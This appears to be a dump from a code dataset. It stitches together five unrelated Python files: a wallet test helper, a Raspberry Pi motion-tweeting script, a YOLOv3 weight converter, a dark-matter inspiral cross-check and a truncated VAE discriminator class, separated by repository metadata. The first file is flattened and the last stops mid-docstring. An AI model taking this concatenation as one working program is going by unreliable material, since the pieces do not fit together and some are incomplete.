#!/usr/bin/env python3 # Copyright (c) 2018-2020 The Pexa Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Useful util functions for testing the wallet""" from collections import namedtuple from test_framework.address import ( key_to_p2pkh, key_to_p2sh_p2wpkh, key_to_p2wpkh, script_to_p2sh, script_to_p2sh_p2wsh, script_to_p2wsh, ) from test_framework.key import ( bytes_to_wif, ECKey, ) from test_framework.script import ( CScript, OP_0, OP_2, OP_3, OP_CHECKMULTISIG, OP_CHECKSIG, OP_DUP, OP_EQUAL, OP_EQUALVERIFY, OP_HASH160, hash160, sha256, ) from test_framework.util import hex_str_to_bytes Key = namedtuple('Key', ['privkey', 'pubkey', 'p2pkh_script', 'p2pkh_addr', 'p2wpkh_script', 'p2wpkh_addr', 'p2sh_p2wpkh_script', 'p2sh_p2wpkh_redeem_script', 'p2sh_p2wpkh_addr']) Multisig = namedtuple('Multisig', ['privkeys', 'pubkeys', 'p2sh_script', 'p2sh_addr', 'redeem_script', 'p2wsh_script', 'p2wsh_addr', 'p2sh_p2wsh_script', 'p2sh_p2wsh_addr']) def get_key(node): """Generate a fresh key on node Returns a named tuple of privkey, pubkey and all address and scripts.""" addr = node.getnewaddress() pubkey = node.getaddressinfo(addr)['pubkey'] pkh = hash160(hex_str_to_bytes(pubkey)) return Key(privkey=node.dumpprivkey(addr), pubkey=pubkey, p2pkh_script=CScript([OP_DUP, OP_HASH160, pkh, OP_EQUALVERIFY, OP_CHECKSIG]).hex(), p2pkh_addr=key_to_p2pkh(pubkey), p2wpkh_script=CScript([OP_0, pkh]).hex(), p2wpkh_addr=key_to_p2wpkh(pubkey), p2sh_p2wpkh_script=CScript([OP_HASH160, hash160(CScript([OP_0, pkh])), OP_EQUAL]).hex(), p2sh_p2wpkh_redeem_script=CScript([OP_0, pkh]).hex(), p2sh_p2wpkh_addr=key_to_p2sh_p2wpkh(pubkey)) def get_generate_key(): """Generate a fresh key Returns a named tuple of privkey, pubkey and all address and scripts.""" eckey = ECKey() eckey.generate() privkey = bytes_to_wif(eckey.get_bytes()) pubkey = eckey.get_pubkey().get_bytes().hex() pkh = hash160(hex_str_to_bytes(pubkey)) return Key(privkey=privkey, pubkey=pubkey, p2pkh_script=CScript([OP_DUP, OP_HASH160, pkh, OP_EQUALVERIFY, OP_CHECKSIG]).hex(), p2pkh_addr=key_to_p2pkh(pubkey), p2wpkh_script=CScript([OP_0, pkh]).hex(), p2wpkh_addr=key_to_p2wpkh(pubkey), p2sh_p2wpkh_script=CScript([OP_HASH160, hash160(CScript([OP_0, pkh])), OP_EQUAL]).hex(), p2sh_p2wpkh_redeem_script=CScript([OP_0, pkh]).hex(), p2sh_p2wpkh_addr=key_to_p2sh_p2wpkh(pubkey)) def get_multisig(node): """Generate a fresh 2-of-3 multisig on node Returns a named tuple of privkeys, pubkeys and all address and scripts.""" addrs = [] pubkeys = [] for _ in range(3): addr = node.getaddressinfo(node.getnewaddress()) addrs.append(addr['address']) pubkeys.append(addr['pubkey']) script_code = CScript([OP_2] + [hex_str_to_bytes(pubkey) for pubkey in pubkeys] + [OP_3, OP_CHECKMULTISIG]) witness_script = CScript([OP_0, sha256(script_code)]) return Multisig(privkeys=[node.dumpprivkey(addr) for addr in addrs], pubkeys=pubkeys, p2sh_script=CScript([OP_HASH160, hash160(script_code), OP_EQUAL]).hex(), p2sh_addr=script_to_p2sh(script_code), redeem_script=script_code.hex(), p2wsh_script=witness_script.hex(), p2wsh_addr=script_to_p2wsh(script_code), p2sh_p2wsh_script=CScript([OP_HASH160, witness_script, OP_EQUAL]).hex(), p2sh_p2wsh_addr=script_to_p2sh_p2wsh(script_code)) def test_address(node, address, **kwargs): """Get address info for `address` and test whether the returned values are as expected.""" addr_info = node.getaddressinfo(address) for key, value in kwargs.items(): if value is None: if key in addr_info.keys(): raise AssertionError("key {} unexpectedly returned in getaddressinfo.".format(key)) elif addr_info[key] != value: raise AssertionError("key {} value {} did not match expected value {}".format(key, addr_info[key], value))
40.300813
118
0.598749
db31b90359641493ef788c292665f0f9203dee36
4,877
py
Python
tweet_motion_jpg.py
syncom/twitimg
cbc8163b97f86c1828fc1007e73e3eff583d5b65
[ "Apache-2.0" ]
1
2020-07-12T17:26:16.000Z
2020-07-12T17:26:16.000Z
tweet_motion_jpg.py
syncom/twitimg-rpi
cbc8163b97f86c1828fc1007e73e3eff583d5b65
[ "Apache-2.0" ]
null
null
null
tweet_motion_jpg.py
syncom/twitimg-rpi
cbc8163b97f86c1828fc1007e73e3eff583d5b65
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python """Tweet motion-detected JPEG image. This module captures and tweets a motion-detected JPEG image from a Raspberry Pi with a camera module. The image capture part is credited to the excellent post https://www.raspberrypi.org/forums/viewtopic.php?t=45235, by brainflakes. Read brainflakes' original post for the algorithm. I have removed the force capture part for this script. """ import StringIO import subprocess import os import time import argparse from datetime import datetime from PIL import Image import importlib from twython import Twython # Motion detection settings: # - threshold: how much a pixel has to change by to be marked as "changed" # - sensitivity: how many changed pixels before capturing an image threshold = 10 sensitivity = 800 test_width = 100 test_height = 75 # File settings save_width = 1280 save_height = 960 reserve_diskspace = 40 * 1024 * 1024 # Keep 40 mb free on disk # Capture a small bitmap test image, for motion detection def captureTestImage(): command = "raspistill -n -w %s -h %s -t 1000 -e bmp -o -" % (test_width, test_height) output = None image_data = StringIO.StringIO() try: output = subprocess.check_output(command, shell=True) except subprocess.CalledProcessError: print "Command exited with non-zero code. No output." return None, None if output: image_data.write(output) image_data.seek(0) im = Image.open(image_data) buffer = im.load() image_data.close() return im, buffer # Save a full size image to disk def saveImage(width, height, dirname, diskSpaceToReserve): keepDiskSpaceFree(dirname, diskSpaceToReserve) time = datetime.now() filename = "motion-%04d%02d%02d-%02d%02d%02d.jpg" % (time.year, time.month, time.day, time.hour, time.minute, time.second) command = "raspistill -n -w %s -h %s -t 10 -e jpg -q 15 -o %s/%s" % (width, height, dirname.rstrip('/'), filename) try: subprocess.call(command, shell=True) except subprocess.CalledProcessError: print "Command exited with non-zero code. No file captured." return None print "Captured %s/%s" % (dirname.rstrip('/'), filename) return dirname.rstrip('/') + '/' + filename # Keep free space above given level def keepDiskSpaceFree(dirname, bytesToReserve): if (getFreeSpace(dirname) < bytesToReserve): for filename in sorted(os.listdir(dirname)): if filename.startswith("motion") and filename.endswith(".jpg"): os.remove(dirname.rstrip('/') +"/" + filename) print "Deleted %s/%s to avoid filling disk" % ( dirname.rstrip('/'), filename ) if (getFreeSpace(dirname) > bytesToReserve): return return # Get available disk space def getFreeSpace(dir): st = os.statvfs(dir) du = st.f_bavail * st.f_frsize return du # Where work happens def do_tweet_motion(dirname): mod = importlib.import_module("tweet_image") # Get first image captured1 = False while (not captured1): image1, buffer1 = captureTestImage() if image1: captured1 = True while (True): # Time granule for wait in the case of error/exception basic_wait = 300 # Double multiplicity when error/exception happens mult = 1 # Get comparison image captured2 = False while (not captured2): image2, buffer2 = captureTestImage() if image2: captured2 = True # Count changed pixels changedPixels = 0 for x in xrange(0, test_width): for y in xrange(0, test_height): # Just check green channel as it's the highest quality channel pixdiff = abs(buffer1[x,y][1] - buffer2[x,y][1]) if pixdiff > threshold: changedPixels += 1 # Save an image if pixels changed if changedPixels > sensitivity: fpath = saveImage(save_width, save_height, dirname, reserve_diskspace) # Tweet saved image if fpath: try: mod.do_tweet(fpath) mult = 1 except Exception as e: print "Tweet failed. Encountered exception, as follows: " print(e) sleeptime = mult * basic_wait time.sleep(sleeptime) # Wait some time print("Retry after {0} seconds".format(sleeptime)) mult = mult * 2 # Swap comparison buffers image1 = image2 buffer1 = buffer2 if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("dir_path") args = parser.parse_args() do_tweet_motion(args.dir_path)
33.176871
126
0.62764
c088a33edc880ce4aa89e86bc61efab784996be5
3,479
py
Python
models/yolov3/conversion/reconstruct_conv_layer.py
martinGalajdaSchool/object-detection
2c72b643464a89b91daac520a862ebaad2b3f9f0
[ "Apache-2.0" ]
2
2019-12-11T05:50:39.000Z
2021-12-06T12:28:40.000Z
models/yolov3/conversion/reconstruct_conv_layer.py
martinGalajdaSchool/object-detection
2c72b643464a89b91daac520a862ebaad2b3f9f0
[ "Apache-2.0" ]
19
2019-12-16T21:23:00.000Z
2022-03-02T14:59:12.000Z
models/yolov3/conversion/reconstruct_conv_layer.py
martin-galajda/object-detection
2c72b643464a89b91daac520a862ebaad2b3f9f0
[ "Apache-2.0" ]
null
null
null
from typing import Dict, Any from keras import backend as K import keras import numpy as np from keras.layers import ( Conv2D, ZeroPadding2D, ) from keras.layers.advanced_activations import LeakyReLU from keras.layers.normalization import BatchNormalization from keras.regularizers import l2 from models.yolov3.conversion.constants import YoloV3Activations def parse_conv_layer( *, prev_layer: keras.layers.Layer, layer_config: Dict[str, Any], weight_decay: float, weights_file: Any ): weight_read = 0 filters = int(layer_config['filters']) size = int(layer_config['size']) stride = int(layer_config['stride']) pad = int(layer_config['pad']) activation = layer_config['activation'] batch_normalize = 'batch_normalize' in layer_config # padding = 'same' is equivalent to pad = 1 in Darknet padding = 'same' if pad == 1 and stride == 1 else 'valid' # Darknet serializes convolutional weights as: # [bias/beta, [gamma, mean, variance], conv_weights] prev_layer_shape = K.int_shape(prev_layer) # This assumes channel last dimension ordering. weights_shape = (size, size, prev_layer_shape[-1], filters) darknet_w_shape = (filters, weights_shape[2], size, size) weights_size = np.product(weights_shape) print('with batch normalization' if batch_normalize else ' ', activation, weights_shape) conv_bias = np.ndarray( shape=(filters,), dtype='float32', buffer=weights_file.read(filters * 4)) weight_read += filters if batch_normalize: bn_weights = np.ndarray( shape=(3, filters), dtype='float32', buffer=weights_file.read(filters * 12)) weight_read += 3 * filters bn_weight_list = [ bn_weights[0], # <-- scale gamma conv_bias, # <-- shift beta bn_weights[1], # <-- running mean bn_weights[2] # <-- running var ] conv_weights = np.ndarray( shape=darknet_w_shape, dtype='float32', buffer=weights_file.read(weights_size * 4)) weight_read += weights_size # DarkNet conv_weights are serialized Caffe-style: (output_dim, input_dim, height, width) # We need to set them into Tensorflow order: (height, width, input_dim, output_dim) height_dim_pos, width_dim_pos, input_dim_pos, output_dim_pos = 2, 3, 1, 0 conv_weights = np.transpose(conv_weights, [height_dim_pos, width_dim_pos, input_dim_pos, output_dim_pos]) conv_weights = [conv_weights] if batch_normalize else [ conv_weights, conv_bias ] if stride > 1: # Darknet uses left and top padding instead of 'same' mode prev_layer = ZeroPadding2D(((1, 0), (1, 0)))(prev_layer) # Create Conv2D layer conv_layer = (Conv2D( filters, (size, size), strides=(stride, stride), kernel_regularizer=l2(weight_decay), use_bias=not batch_normalize, weights=conv_weights, activation=None, padding=padding))(prev_layer) if batch_normalize: conv_layer = (BatchNormalization(weights=bn_weight_list))(conv_layer) if activation == YoloV3Activations.LINEAR: return conv_layer, weight_read if activation == YoloV3Activations.LEAKY: conv_layer = LeakyReLU(alpha=0.1)(conv_layer) return conv_layer, weight_read raise ValueError(f'Unknown activation function `{activation}`.')
31.917431
109
0.668295
db0a415f964ef500015b723dc104a1b9c790c06d
10,256
py
Python
tests/crosschecks1711.09706.py
Lukas-Hoelker/SIDM-GWs
6c80b9a0bcf7ec93ef3ab74dda5a91c492a63b69
[ "MIT" ]
1
2021-11-09T14:05:48.000Z
2021-11-09T14:05:48.000Z
tests/crosschecks1711.09706.py
Lukas-Hoelker/SIDM-GWs
6c80b9a0bcf7ec93ef3ab74dda5a91c492a63b69
[ "MIT" ]
null
null
null
tests/crosschecks1711.09706.py
Lukas-Hoelker/SIDM-GWs
6c80b9a0bcf7ec93ef3ab74dda5a91c492a63b69
[ "MIT" ]
1
2022-02-03T01:52:41.000Z
2022-02-03T01:52:41.000Z
import numpy as np import matplotlib.pyplot as plt from scipy.interpolate import UnivariateSpline, interp1d from scipy.integrate import quad import collections from imripy import halo from imripy import merger_system as ms from imripy import inspiral from imripy import waveform inspiral.Classic.ln_Lambda=3. def Meff(sp, r): return np.where(r > sp.r_isco(), sp.m1 - 4.*np.pi*sp.halo.rho_spike*sp.halo.r_spike**3 *sp.r_isco()**(3.-sp.halo.alpha) /(3.-sp.halo.alpha), sp.m1) def F(sp, r): return np.where(r > sp.r_isco(), 4.*np.pi * sp.halo.rho_spike*sp.halo.r_spike**sp.halo.alpha /(3.-sp.halo.alpha), 0.) def coeffs(sp): alpha = sp.halo.alpha eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco()) m2 = sp.m2 if isinstance(m2, (np.ndarray, collections.Sequence)): m2 = m2[-1] c_gw = 256./5.* m2 * Meff(sp, 2.*sp.r_isco())**2 * eps**(4./(3.-alpha)) c_df = 8.*np.pi*m2 *sp.halo.rho_spike *sp.halo.r_spike**alpha * 3. \ * Meff(sp, 2.*sp.r_isco())**(-3./2.)* eps**((2.*alpha-3.)/(6.-2.*alpha)) ctild = c_df/c_gw return c_gw, c_df, ctild def b_A(sp, x, alpha): eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco()) r = x/eps**(1./(3.-alpha)) omega_s = np.sqrt(Meff(sp, r)/r**3 + F(sp, r)/r**(sp.halo.alpha)) return 4. * r**2 * omega_s**2 / inspiral.Classic.ln_Lambda * (1. + r**2 * omega_s**2) def f_gw(x, alpha): return (1.+x**(3.-alpha))**3 / ( 4.*x**3 * ( 1.+ (4.-alpha) *x**(3.-alpha) ) ) def f_df(x, alpha): return 1. / ( (1.+x**(3.-alpha))**(1./2.) * ( 1.+ (4.-alpha) *x**(3.-alpha) )* x**(-5./2.+alpha) ) def plotDiffEq(sp, r0, r1): r = np.geomspace(r0, r1, num=100) alpha = sp.halo.alpha eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco()) x = eps**(1./(3.-alpha))*r c_gw, c_df, ctild = coeffs(sp) print(c_gw*ms.year_to_pc, c_df*ms.year_to_pc) l, = plt.loglog(r/sp.r_isco(), np.abs(inspiral.Classic.dE_gw_dt(sp, r))/inspiral.Classic.dE_orbit_da(sp, r), label=r'$dE_{gw}/dt / dE_{orbit}/dR$', alpha=0.5) plt.loglog(r/sp.r_isco(), c_gw*f_gw(x, alpha) , label='$c_{gw}f_{gw}$', color=l.get_c(), linestyle='--') l, = plt.loglog(r/sp.r_isco(), np.abs(inspiral.Classic.dE_df_dt(sp, r))/inspiral.Classic.dE_orbit_da(sp, r), label=r'$dE_{df}/dt / dE_{orbit}/dR$', alpha=0.5) plt.loglog(r/sp.r_isco(), c_df* f_df(x, alpha), label='$c_{df}f_{df}$' , color=l.get_c(), linestyle='--') l, = plt.loglog(r/sp.r_isco(), np.abs(inspiral.Classic.dE_acc_dt(sp, r))/inspiral.Classic.dE_orbit_da(sp, r), label=r'$dE_{acc}/dt / dE_{orbit}/dR$', alpha=0.5) plt.loglog(r/sp.r_isco(), c_df* f_df(x, alpha)*b_A(sp, x, alpha), label='$c_{df}f_{df}b_A$' , color=l.get_c(), linestyle='--') plt.xlabel('$r/r_{ISCO}$') def J(x, alpha): return 4. * x**(11./2. - alpha) / (1. + x**(3.-alpha))**(7./2.) def K(x, alpha): return (1.+x**(3.-alpha))**(5./2.) * (1. + alpha/3.*x**(3.-alpha)) / (1. + (4.-alpha)*x**(3-alpha) ) def plotPhiprimeprime(sp, r0, r1): r = np.geomspace(r0, r1, num=100) alpha = sp.halo.alpha eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco()) x = eps**(1./(3.-alpha))*r c_gw, c_df, ctild = coeffs(sp) plt.loglog(r/sp.r_isco(), Meff(sp, 2.*sp.r_isco())**(1./2.) * eps**(3./2./(3.-alpha)) \ * c_gw*(1.+ctild*J(x, alpha)*(1.+b_A(sp, x, alpha))) *3./4.* K(x,alpha) * x**(-11./2.), label=r'$\ddot{\Phi}^{paper}$' ) #plt.loglog(r/sp.r_isco(), Meff(sp, 2.*sp.r_isco)**(1./2.) * eps**(3./2./(3.-alpha)) \ # * (c_gw*f_gw(x, alpha) + c_df*f_df(x, alpha)) * (3. + alpha*x**(3.-alpha))/(x**(5./2.) * (1.+ x**(3.-alpha))**(1./2.) ), label=r'$\ddot{\Phi}^{paper,ref}$' ) plt.loglog(r/sp.r_isco(), (sp.mass(r)/r**3 )**(-1./2.) * (-3.*sp.mass(r)/r**4 + 4.*np.pi *sp.halo.density(r)/r )* inspiral.Classic.da_dt(sp, r), label=r'$\ddot{\Phi}^{code}$') plt.xlabel(r'$r/r_{ISCO}$') def L(sp, f): alpha = sp.halo.alpha eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco()) c_gw, c_df, ctild = coeffs(sp) c_eps = Meff(sp, 2.*sp.r_isco())**(11./6.-1./3.*alpha) * ctild * eps**((11.-2.*alpha)/(6.-2.*alpha)) b_eps = (np.pi*f * Meff(sp, 2.*sp.r_isco()))**(2./3.) / inspiral.Classic.ln_Lambda * (1. + (np.pi*f * Meff(sp, 2.*sp.r_isco()))**(2./3.)) deltatild = (1./np.pi**2 / f**2)**(1.-alpha/3.) return 1. + 4.*c_eps*deltatild**((11.-2.*alpha)/(6.-2.*alpha)) * (1. + b_eps) def phaseIntegrand(sp, f): alpha = sp.halo.alpha eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco()) delta = (Meff(sp, 2.*sp.r_isco())/ np.pi**2 / f**2)**((3.-alpha)/3.) chi = 1. + delta*eps/3. + (2.-alpha)/9. *delta**2 * eps**2 x = (delta*eps)**(1./(3.-alpha)) *chi c_gw, c_df, ctild = coeffs(sp) return chi**(11./2.) / f**(8./3.) / K(x, alpha) / (1. + ctild*J(x,alpha)*(1. + b_A(sp, x, alpha))) def plotPhase(sp, t, R, omega_s): #f = np.geomspace(omega_s[1], omega_s[-2], num=200)/np.pi #f_isco = f[-1] f_gw = omega_s/np.pi f_isco = f_gw[-1] t_c = t[-1] + 5./256. * R[-1]**4/sp.m_total()**2 / sp.m_reduced() if isinstance(t_c, (np.ndarray, collections.Sequence)): t_c = t_c[-1] PhiTild0 = - 3./4. * (8.*np.pi*sp.m_chirp()*f_gw)**(-5./3.) + 3./4.*(8.*np.pi*sp.m_chirp()*f_isco)**(-5./3.) #plt.plot(f_gw*ms.year_to_pc*3.17e-8, PhiTild0, label=r'$\tilde{\Phi}_0^{analytic}$') t_of_f = interp1d(omega_s/np.pi, t, kind='cubic', bounds_error=True) #omega_gw = UnivariateSpline(t, 2*omega_s, ext=1, k=5 ) omega_gw = interp1d(t, 2*omega_s, kind='cubic', bounds_error=False, fill_value='extrapolate' ) #Phit = np.array([quad(lambda u: np.exp(u)*omega_gw(np.exp(u)), np.log(t[0]), np.log(y0))[0] for y0 in t ]) Phit = np.cumsum([quad(lambda t: omega_gw(t), t[i-1], t[i], limit=500, epsrel=1e-13, epsabs=1e-13)[0] if not i == 0 else 0. for i in range(len(t)) ]) #Phi = interp1d(t, Phit - Phit[-1], kind='cubic', bounds_error=False, fill_value='extrapolate')(t_of_f(f_gw)) Phi = Phit - Phit[-1] tpt = 2.*np.pi*f_gw * (t - t[-1]) PhiTild = tpt - Phi DeltaPhi = PhiTild - PhiTild0 plt.plot(f_gw*ms.year_to_pc*3.17e-8, Phi, label=r'$\Phi^{code}$') plt.plot(f_gw*ms.year_to_pc*3.17e-8, tpt, label=r'$2\pi t^{code}$') plt.plot(f_gw*ms.year_to_pc*3.17e-8, PhiTild, label=r'$\tilde{\Phi}^{code}$') plt.plot(f_gw*ms.year_to_pc*3.17e-8, DeltaPhi, label=r'$\Delta\tilde{\Phi}^{code}$') #integrand = UnivariateSpline(np.log(f), f* f**(-8./3.)/L(sp, f), k=5) #integrand = UnivariateSpline(np.log(f), f* phaseIntegrand(sp, f), k=5) #Phi = integrand.antiderivative() #Phi = np.array([quad(lambda f: np.exp(-5./3.*f)/L(sp, np.exp(f)), np.log(f_gw[0]), np.log(y0))[0] for y0 in f_gw ]) Phi = np.cumsum([quad(lambda f: f**(-8./3.)/L(sp, f), f_gw[i-1], f_gw[i], limit=200, epsrel=1e-13, epsabs=1e-13)[0] if not i == 0 else 0. for i in range(len(f_gw)) ]) Phi = 10./3. * (8.*np.pi*sp.m_chirp())**(-5./3.) * (Phi - Phi[-1]) #integrand2 = UnivariateSpline(np.log(f), f * f**(-11./3.)/L(sp, f), k=5) #integrand2 = UnivariateSpline(np.log(f), phaseIntegrand(sp, f), k=5) #tpt = integrand2.antiderivative() #tpt = np.array([quad(lambda f: np.exp(-8./3.*f)/L(sp, np.exp(f)), np.log(f_gw[0]), np.log(y0))[0] for y0 in f_gw ]) tpt = np.cumsum([quad(lambda f: f**(-11./3.)/L(sp, f), f_gw[i-1], f_gw[i], limit=200, epsrel=1e-13, epsabs=1e-13)[0] if not i==0 else 0. for i in range(len(f_gw)) ]) tpt = 10./3. * (8.*np.pi*sp.m_chirp())**(-5./3.) * f_gw * ( tpt - tpt[-1]) PhiTild = tpt - Phi DeltaPhi = PhiTild - PhiTild0 plt.plot(f_gw*ms.year_to_pc*3.17e-8, Phi, label=r'$\Phi^{paper}$') plt.plot(f_gw*ms.year_to_pc*3.17e-8, tpt, label=r'$2\pi t^{paper}$') plt.plot(f_gw*ms.year_to_pc*3.17e-8, PhiTild, label=r'$\tilde{\Phi}^{paper}$') plt.plot(f_gw*ms.year_to_pc*3.17e-8, DeltaPhi, label=r'$\Delta\tilde{\Phi}^{paper}$') plt.xlabel('f') plt.xscale('log') plt.yscale('symlog') def plotWaveform(sp, t, R, omega_s): #f = np.geomspace(omega_s[1], omega_s[-2], num=500)/np.pi f_gw, h, _, Psi = waveform.h_2( sp, t, omega_s, R) plt.loglog(f_gw*ms.year_to_pc*3.17e-8, h, label=r'$\tilde{h}^{code}$') alpha = sp.halo.alpha eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco()) A = (5./24.)**(1./2.) * np.pi**(-2./3.) /sp.D * sp.m_chirp()**(5./6.) plt.loglog(f_gw*ms.year_to_pc*3.17e-8, A*f_gw**(-7./6.) * (L(sp,f_gw))**(-1./2.), label=r'$\tilde{h}^{paper,approx}$') delta = (Meff(sp, 2.*sp.r_isco())/np.pi**2 / f_gw**2)**(1.-alpha/3.) chi = 1. + delta*eps/3. + (2.-alpha)/9. *delta**2 * eps**2 x = (delta*eps)**(1./(3.-alpha)) *chi c_gw, c_df, ctild = coeffs(sp) plt.loglog(f_gw*ms.year_to_pc*3.17e-8, A*f_gw**(-7./6.) * chi**(19./4.) * (K(x, alpha)* (1. + ctild*J(x, alpha)*(1.+b_A(sp, x, alpha)) ))**(-1./2.), label=r'$\tilde{h}^{paper}$' ) plt.ylabel('h'); plt.xlabel('f') m1 = 1e3 *ms.solar_mass_to_pc m2 = 1. *ms.solar_mass_to_pc D = 1e3 #sp_0 = ms.SystemProp(m1, m2, 1e3, ms.ConstHalo(0)) sp_1 = ms.SystemProp(m1, m2, halo.SpikedNFW( 2.68e-13, 23.1, 0.54, 7./3.), D) plt.figure() plotDiffEq(sp_1, sp_1.r_isco(), 1e7*sp_1.r_isco()) plt.legend(); plt.grid() plt.figure() plotPhiprimeprime(sp_1, sp_1.r_isco(), 1e5*sp_1.r_isco()) plt.legend(); plt.grid() R0 = 100.*sp_1.r_isco() t, R, m2 = inspiral.Classic.evolve_circular_binary(sp_1, R0, sp_1.r_isco(), acc=1e-11, accretion=True) sp_1.m2=m2 omega_s = sp_1.omega_s(R) plt.figure() plotPhase(sp_1, t, R, omega_s) plt.legend(); plt.grid() plt.figure() plotWaveform(sp_1, t, R, omega_s) plt.legend(); plt.grid() plt.figure() plt.loglog(t, m2/ms.solar_mass_to_pc, label="$m_2$") plt.legend(); plt.grid() print("mass increase:", m2[-1]/m2[0] -1.) # Now check the eccentric implementation with a tiny eccentricity, it should be very similar a0 = 100.*sp_1.r_isco() e0 = 0.001 sp_1.m2 = 1.*ms.solar_mass_to_pc t2, a2, e2, m22 = inspiral.Classic.evolve_elliptic_binary(sp_1, a0, e0, sp_1.r_isco(), acc=1e-11, accretion=True) plt.figure() plt.loglog(t, R, label='R, cirlular') plt.loglog(t2, a2, label='a, elliptic') plt.loglog(t, m2, label='$m_2$, cirlular') plt.loglog(t2, m22, label='$m_2$, elliptic') plt.loglog(t2, e2, label='e') plt.grid(); plt.legend() plt.show()
45.380531
183
0.586291
81630bea6fd9bbf59bfd233fed775e2d7f455fc9
10,794
py
Python
odin/bay/vi/autoencoder/factor_discriminator.py
trungnt13/odin-ai
9c6986a854e62da39637ea463667841378b7dd84
[ "MIT" ]
7
2020-12-29T19:35:58.000Z
2022-01-31T21:01:30.000Z
odin/bay/vi/autoencoder/factor_discriminator.py
imito/odin-ai
9c6986a854e62da39637ea463667841378b7dd84
[ "MIT" ]
3
2020-02-06T16:44:17.000Z
2020-09-26T05:26:14.000Z
odin/bay/vi/autoencoder/factor_discriminator.py
trungnt13/odin-ai
9c6986a854e62da39637ea463667841378b7dd84
[ "MIT" ]
6
2019-02-14T01:36:28.000Z
2020-10-30T13:16:32.000Z
import warnings from typing import Any, Callable, List, Optional, Union, Sequence import numpy as np import tensorflow as tf from odin.bay.layers import DistributionDense from odin.bay.random_variable import RVconf from odin.bay.vi.utils import permute_dims from odin.networks import SequentialNetwork, dense_network from odin.utils import as_tuple from tensorflow_probability.python.distributions import (Distribution, Independent) from typing_extensions import Literal class FactorDiscriminator(SequentialNetwork): r""" The main goal is minimizing the total correlation (the mutual information which quantifies the redundancy or dependency among latent variables). We use a discriminator to estimate total-correlation This class also support Semi-supervised factor discriminator, a combination of supervised objective and total correlation estimation using density-ratio. - 0: real sample for q(z) (or last unit in case n_outputs > 2) and - 1: fake sample from q(z-) If `n_outputs` > 2, suppose the number of classes is `K` then: - 0 to K: is the classes' logits for real sample from q(z) - K + 1: fake sample from q(z-) This class is also extended to handle supervised loss for semi-supervised systems. Paramters ----------- units : a list of Integer, the number of hidden units for each hidden layer. n_outputs : an Integer or instance of `RVmeta`, the number of output units and its distribution ss_strategy : {'sum', 'logsumexp', 'mean', 'max', 'min'}. Strategy for combining the outputs semi-supervised learning into the logit for real sample from q(z): - 'logsumexp' : used for semi-supervised GAN in (Salimans T. 2016) Example -------- ``` # for FactorVAE FactorDiscriminator( observation=RVmeta(1, 'bernoulli', projection=True, name="ind_factors")) # for classifier of ConditionalVAE FactorDiscriminator( observation=RVmeta(ds.shape, 'bernoulli', projection=True, name='image')) ``` References ------------ Kim, H., Mnih, A., 2018. "Disentangling by Factorising". arXiv:1802.05983 [cs, stat]. Salimans, T., Goodfellow, I., Zaremba, W., et al 2016. "Improved Techniques for Training GANs". arXiv:1606.03498 [cs.LG]. """ def __init__( self, batchnorm: bool = False, input_dropout: float = 0., dropout: float = 0., units: Sequence[int] = (1000, 1000, 1000, 1000, 1000), observation: Union[RVconf, Sequence[RVconf]] = RVconf(1, 'bernoulli', projection=True, name="discriminator"), activation: Union[ str, Callable[[tf.Tensor], tf.Tensor]] = tf.nn.leaky_relu, ss_strategy: Literal['sum', 'logsumexp', 'mean', 'max', 'min'] = 'logsumexp', name: str = "FactorDiscriminator", ): if not isinstance(observation, (tuple, list)): observation = [observation] assert len(observation) > 0, "No output is given for FactorDiscriminator" assert all( isinstance(o, (RVconf, DistributionDense)) for o in observation), ( f"outputs must be instance of RVmeta, but given:{observation}") n_outputs = 0 for o in observation: if not o.projection: warnings.warn(f'Projection turn off for observation {o}!') o.event_shape = (int(np.prod(o.event_shape)),) n_outputs += o.event_shape[0] layers = dense_network(units=units, batchnorm=batchnorm, dropout=dropout, flatten_inputs=True, input_dropout=input_dropout, activation=activation, prefix=name) super().__init__(layers, name=name) self.ss_strategy = str(ss_strategy) self.observation = observation self.n_outputs = n_outputs self._distributions = [] assert self.ss_strategy in {'sum', 'logsumexp', 'mean', 'max', 'min'} def build(self, input_shape=None): super().build(input_shape) shape = self.output_shape[1:] self._distributions = [ o.create_posterior(shape) if isinstance(o, RVconf) else o for o in self.observation ] self.input_ndim = len(self.input_shape) - 1 return self def call(self, inputs, **kwargs): if isinstance(inputs, (tuple, list)) and len(inputs) == 1: inputs = inputs[0] outputs = super().call(inputs, **kwargs) # project into different output distributions distributions = [d(outputs, **kwargs) for d in self.distributions] return distributions[0] if len(distributions) == 1 else tuple(distributions) def _to_samples(self, qz_x, mean=False, stop_grad=False): qz_x = tf.nest.flatten(qz_x) if mean: z = tf.concat([q.mean() for q in qz_x], axis=-1) else: z = tf.concat([tf.convert_to_tensor(q) for q in qz_x], axis=-1) z = tf.reshape(z, tf.concat([(-1,), z.shape[-self.input_ndim:]], axis=0)) if stop_grad: z = tf.stop_gradient(z) return z def _tc_logits(self, logits): # use ss_strategy to infer appropriate logits value for # total-correlation estimator (logits for q(z)) in case of n_outputs > 1 Xs = [] for x in tf.nest.flatten(logits): if isinstance(x, Distribution): if isinstance(x, Independent): x = x.distribution if hasattr(x, 'logits'): x = x.logits elif hasattr(x, 'concentration'): x = x.concentration else: raise RuntimeError( f"Distribution {x} doesn't has 'logits' or 'concentration' " "attributes, cannot not be used for estimating total correlation." ) Xs.append(x) # concatenate the outputs if len(Xs) == 0: raise RuntimeError( f"No logits values found for total correlation: {logits}") elif len(Xs) == 1: Xs = Xs[0] else: Xs = tf.concat(Xs, axis=-1) # only 1 unit, only estimate TC if self.n_outputs == 1: return Xs[..., 0] # multiple units, reduce return getattr(tf, 'reduce_%s' % self.ss_strategy)(Xs, axis=-1) def total_correlation(self, qz_x: Distribution, training: Optional[bool] = None) -> tf.Tensor: r""" Total correlation Eq(3) ``` TC(z) = KL(q(z)||q(z-)) = E_q(z)[log(q(z) / q(z-))] ~ E_q(z)[ log(D(z)) - log(1 - D(z)) ] ``` We want to minimize the total correlation to achieve factorized latent units Note: In many 